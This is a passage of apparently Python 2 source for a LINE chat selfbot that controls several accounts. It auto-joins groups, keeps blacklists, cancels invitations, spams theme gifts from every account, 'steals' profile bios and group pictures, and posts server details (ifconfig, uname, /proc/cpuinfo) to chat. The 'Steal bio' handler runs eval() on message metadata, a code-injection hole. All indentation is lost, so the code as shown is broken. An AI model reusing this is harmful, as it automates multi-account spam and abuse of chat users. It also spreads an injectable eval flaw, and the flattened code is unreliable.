kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # assume invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to, helpMessage)
elif msg.text in ["Textspeech","textspeech","TextSpeech"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, textspeech + datetime.today().strftime('%H:%M:%S'))
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:","").strip()
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'contact bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#=======================================================
elif msg.text in ["You"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to,"add bossque")
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME', 'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg)
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif 'allbio:' in msg.text.lower():
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "My name:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("My name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
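# Lookup and server-info commands: song lyrics via the joox API, Wikipedia summaries, bot restart, and basic host diagnostics (ifconfig, df, uname, cpuinfo, uptime).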
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Song Lyrics ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'runtime':
if msg.from_ in admin:
eltime = time.time()
van = "Bot has been running for "+waktu(eltime)
cl.sendText(msg.to,van)
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Title : ' + song[0]
hasil += '\nDuration : ' + song[1]
hasil += '\nDownload Link : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#elif 'instagram ' in msg.text.lower():
# try:
# instagram = msg.text.lower().replace("instagram ","")
# html = requests.get('https://www.instagram.com/' + instagram + '/?')
# soup = BeautifulSoup(html.text, 'html5lib')
# data = soup.find_all('meta', attrs={'property':'og:description'})
# text = data[0].get('content').split()
# data1 = soup.find_all('meta', attrs={'property':'og:image'})
# text1 = data1[0].get('content').split()
# user = "Name: " + text[-2] + "\n"
# user1 = "Username: " + text[-1] + "\n"
# followers = "Followers: " + text[0] + "\n"
# following = "Following: " + text[2] + "\n"
# post = "Post: " + text[4] + "\n"
# link = "Link: " + "https://www.instagram.com/" + instagram
# detail = "========INSTAGRAM INFO USER========\n"
# details = "\n========INSTAGRAM INFO USER========"
# cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
# cl.sendImageWithURL(msg.to, text1[0])
# cl.sendText("Follow yak Fast Follback ")
# except Exception as njer:
# cl.sendText(msg.to, str(njer))
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.replace("instagram ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
text = detail + "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link + details
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
cl.sendText(msg.to,"Follow Fast Follback")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"════FROM ID════\n" + "" + kata + "\n════TO ENGLISH════\n" + "" + result + "\n══════SUKSES═════")
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
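# Group invitation management: cancel pending invites and open/close the group's join-by-link (ticket) setting via a randomly chosen bot from KAC.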
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif 'creator' in msg.text.lower():
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"My Creator ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
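# Text-to-speech commands: "Vn-<lang> <text>" renders the text with gTTS in the given language, saves it to tts.mp3, and sends it as audio.
# (The per-language branches below differ only in the gTTS lang code; a dict mapping command suffixes to codes could replace them, but they are left as-is here.)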
elif "Vn-af " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-af ","")
tts = gTTS(psn, lang='af', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sq " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sq ","")
tts = gTTS(psn, lang='sq', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ar " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ar ","")
tts = gTTS(psn, lang='ar', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hy ","")
tts = gTTS(psn, lang='hy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-bn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-bn ","")
tts = gTTS(psn, lang='bn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ca " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ca ","")
tts = gTTS(psn, lang='ca', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zh " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zh ","")
tts = gTTS(psn, lang='zh', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhcn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhcn ","")
tts = gTTS(psn, lang='zh-cn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhtw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhtw ","")
tts = gTTS(psn, lang='zh-tw', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhyue " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhyue ","")
tts = gTTS(psn, lang='zh-yue', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hr ","")
tts = gTTS(psn, lang='hr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cs " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cs ","")
tts = gTTS(psn, lang='cs', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-da " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-da ","")
tts = gTTS(psn, lang='da', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-nl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-nl ","")
tts = gTTS(psn, lang='nl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-en " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-en ","")
tts = gTTS(psn, lang='en', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enau " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enau ","")
tts = gTTS(psn, lang='en-au', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enuk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enuk ","")
tts = gTTS(psn, lang='en-uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enus ","")
tts = gTTS(psn, lang='en-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eo " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eo ","")
tts = gTTS(psn, lang='eo', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fi ","")
tts = gTTS(psn, lang='fi', slow=False)
tts.save('tts.mp3')
